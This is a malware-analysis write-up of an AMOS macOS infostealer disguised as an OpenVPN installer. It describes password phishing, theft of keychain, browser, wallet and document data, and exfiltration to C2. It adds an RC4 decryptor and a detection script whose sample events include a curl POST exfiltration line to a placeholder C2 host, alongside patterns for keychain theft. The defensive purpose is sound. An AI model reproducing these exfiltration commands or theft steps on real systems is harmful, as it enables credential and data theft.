macOS InfoStealer - Malware Research
Recently, I was given the opportunity to conduct an analysis on a real malware sample at work and was praised for my efforts and dedication in analyzing it. Here is my writeup on the whole incident.
Malware Distribution
On 12th September, a user received a Google Form posing as a hiring test from a fake company calling itself Vantage Point Media (vpmediatech[.]com). The user was prompted to enter their email and name and to answer a set of questions replicating real interview questions. On the final page, however, the user was prompted to download a suspicious OpenVPN program.
If the user was using macOS, accessing the download link redirected them to https://utv4fun[.]com/kusaka[.]php?call=vpn, where a .dmg file was fetched and downloaded automatically onto the system. After a few page refreshes, we could see several .dmg files being downloaded, each with a different version number at the end of the filename.
If the user was using Windows, accessing the download link instead redirected them to https://openvpn-win[.]pages[.]dev/, where a malicious MSI installer was downloaded automatically onto the system. The scope of this writeup, however, is limited to the .dmg file for now.
Technical Analysis
Mounting the .dmg file as a volume on my virtual machine (macOS Sonoma 14) and examining its contents revealed a universal Mach-O binary supporting both the x86 and ARM architectures. The binary is also ad-hoc signed, which means it carries no Developer ID certificate and provides no cryptographic proof of its origin.
When the binary is executed directly, the user is instructed to launch the application by right-clicking it and choosing Open. This is a common tactic for overriding Gatekeeper (a security feature built into Apple’s operating system) in order to run unsigned applications. Ref.
After launching the application, the user is prompted again, this time for their password. This was most likely intended to trick the user into granting root privileges so the malware could access certain macOS utilities.
Decompiling the binary reveals a long hex string, most likely the payload.
Conveniently, a 32-byte hex string sits directly below the payload, most likely the decryption key.
Instead of XOR, the payload is encrypted with RC4. The decrypted payload can be downloaded here: download (password is infected)
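To illustrate the decryption step, here is an added example (not code from the writeup or from the malware) that implements RC4 and applies it to a hex payload with a hex key, mirroring the layout found in the binary. The key and payload below are constructed stand-ins, not the real strings from the sample.

```python
# Added example: RC4 decryption of an embedded hex payload with a hex key,
# the way an analyst recovers a stealer's dropped script. The key and
# payload are CONSTRUCTED for this example, not taken from the real binary.
from typing import Iterator


def rc4_keystream(key: bytes) -> Iterator[int]:
    """Plain RC4: key-scheduling (KSA) followed by the PRGA keystream."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is symmetric: the same call encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, rc4_keystream(key)))


def decrypt_hex_payload(payload_hex: str, key_hex: str) -> bytes:
    """Mirror the binary's layout: a hex payload with a hex key right below it."""
    return rc4(bytes.fromhex(key_hex), bytes.fromhex(payload_hex))


def looks_like_applescript(blob: bytes) -> bool:
    """Cheap sanity check that the decrypted bytes are a dropped AppleScript."""
    text = blob.decode("utf-8", errors="ignore")
    return any(m in text for m in ("do shell script", "tell application", "osascript"))


# Constructed stand-ins: a 32-byte key and a tiny script encrypted under it.
SAMPLE_KEY_HEX = bytes(range(0x10, 0x30)).hex()
SAMPLE_SCRIPT = b'set release to true\ndo shell script "system_profiler SPHardwareDataType"\n'
SAMPLE_PAYLOAD_HEX = rc4(bytes.fromhex(SAMPLE_KEY_HEX), SAMPLE_SCRIPT).hex()

if __name__ == "__main__":
    print(decrypt_hex_payload(SAMPLE_PAYLOAD_HEX, SAMPLE_KEY_HEX).decode())
```

Swap in the two strings lifted from the decompiled binary and the output should read as the AppleScript analyzed in the next section.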
Payload Analysis
Hide Terminal and Create Staging Directory
Analyzing the AppleScript, the malware first sets the variables release and filegrabbers to true, most likely to enable certain functions during the data exfiltration process. It then ensures the Terminal window stays hidden while the script runs in the background, concealing itself from the user.
The malware then retrieves the current username to construct the path to the user’s home directory. It also creates a staging directory to store all data stolen from the system. The staging directory is named with a random four-digit number between 1000 and 9999, and its path is assigned to the variable writemind.
System Information Extraction
The data extraction process begins by collecting system information, including software, hardware, and display configurations, using the system_profiler utility. The output of this command is written to a file named “info” under the staging directory.
Password Prompt using DSCL
The malware constructs the path to the user’s Application Support directory, which it uses to locate various application data. It then calls a function that uses DSCL to display an authentication prompt and retrieve the user’s password.
According to the checkvalid() and getpwd() functions, if the password entered by the user is valid, the malware attempts to retrieve the Chrome password from the macOS keychain and writes it to a file named “masterpass-chrome” under the staging directory. Otherwise, the malware enters a loop that repeatedly prompts the user until a valid password is entered.
Data Extraction
Several mappings were created to define the directory paths for specific Chromium-based browsers and cryptocurrency wallet applications.
The malware then recursively reads the data stored in the mapped directories to extract Chromium-based browser data (cookies, web data, plugins, etc.) and JSON files belonging to specific cryptocurrency wallet applications, each stored as separate files and directories under the staging directory. The malware also uses the filegrabber() function to collect Safari cookies, the Apple Notes database and files with the extensions .pdf, .docx, .doc, .wallet and .keys from the Desktop, Documents and Downloads folders. The data collected by filegrabber() is copied into a directory named “FileGrabber” under the staging directory.
One thing to note: the filegrabber() function appears to copy only files that do not exceed 10 MB into the “FileGrabber” folder. This was most likely done to avoid network bandwidth issues, server limitations and timeouts during exfiltration to the C2 server.
Data from other sources is also extracted, including Firefox data, the keychain database and Telegram data, each stored as separate files under the staging directory.
Exfiltration
Finally, the malware compresses the staging directory into a ZIP file and exfiltrates it to the C2 server using curl, via an HTTP POST request to the /joinsystem endpoint that carries a predefined user and BuildID. It then covers its tracks by deleting the staging directory and the ZIP file from the system after exfiltration.
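The behaviour chain described in the Payload Analysis and Exfiltration sections (system_profiler collection, a DSCL password check, Chrome keychain access, zipping a four-digit staging directory and a curl POST to /joinsystem) is a useful hunting signature. The following is an added detection example, not code from the writeup: it runs over constructed process-execution events whose field names (ppid, parent_name, cmdline) are an assumption rather than any vendor’s telemetry schema.

```python
# Added example: flag the AMOS-style behaviour chain when several distinct
# stages run under the same osascript parent. The events and the field names
# are CONSTRUCTED; adapt the field mapping to your EDR's actual schema.
import re
from collections import defaultdict

INDICATORS = {
    "sysinfo":   re.compile(r"^system_profiler\b"),
    "dscl_auth": re.compile(r"^dscl\b.*-authonly\b"),
    "keychain":  re.compile(r"^security\b.*find-generic-password\b.*Chrome"),
    "staging":   re.compile(r"^(zip|ditto)\b.*/Users/[^/\s]+/\d{4}\b"),
    "exfil":     re.compile(r"^curl\b.*(-X\s*POST|--data|-F\b).*/joinsystem\b"),
}
MIN_HITS = 3  # require several distinct stages, not one noisy admin command


def detect_amos_chain(events: list[dict]) -> dict[str, set[str]]:
    """Return {parent_pid: matched_stage_names} for every osascript parent
    under which at least MIN_HITS distinct indicator stages were observed."""
    hits: dict[str, set[str]] = defaultdict(set)
    for ev in events:
        if ev.get("parent_name") != "osascript":
            continue  # the dropped script runs its helpers via osascript
        for name, pattern in INDICATORS.items():
            if pattern.search(ev["cmdline"]):
                hits[str(ev["ppid"])].add(name)
    return {ppid: stages for ppid, stages in hits.items() if len(stages) >= MIN_HITS}


# Constructed sample telemetry; usernames, pids and the C2 host are made up.
SAMPLE_EVENTS = [
    {"ppid": 501, "parent_name": "osascript",
     "cmdline": "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType"},
    {"ppid": 501, "parent_name": "osascript", "cmdline": "dscl /Local/Default -authonly alice"},
    {"ppid": 501, "parent_name": "osascript", "cmdline": "security find-generic-password -a Chrome"},
    {"ppid": 501, "parent_name": "osascript",
     "cmdline": "zip -r /Users/alice/4827/out.zip /Users/alice/4827"},
    {"ppid": 501, "parent_name": "osascript",
     "cmdline": "curl -X POST -F file=@/Users/alice/4827/out.zip http://C2_PLACEHOLDER/joinsystem"},
    # Benign: an admin running system_profiler from Terminal must not trigger.
    {"ppid": 777, "parent_name": "Terminal", "cmdline": "system_profiler SPHardwareDataType"},
]

if __name__ == "__main__":
    for ppid, stages in detect_amos_chain(SAMPLE_EVENTS).items():
        print(f"suspicious osascript parent {ppid}: {sorted(stages)}")
```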
Summary
The malware was a variant of the Atomic macOS Stealer (AMOS)/Poseidon infostealer that affects both Windows and macOS users. The reason I documented this incident is that it was the first time (to my knowledge) I had encountered an AMOS variant that masqueraded as OpenVPN and used RC4 as its payload encryption method. Additionally, I want to share the fun stuff I’ve encountered during my work instead of just triaging alerts daily.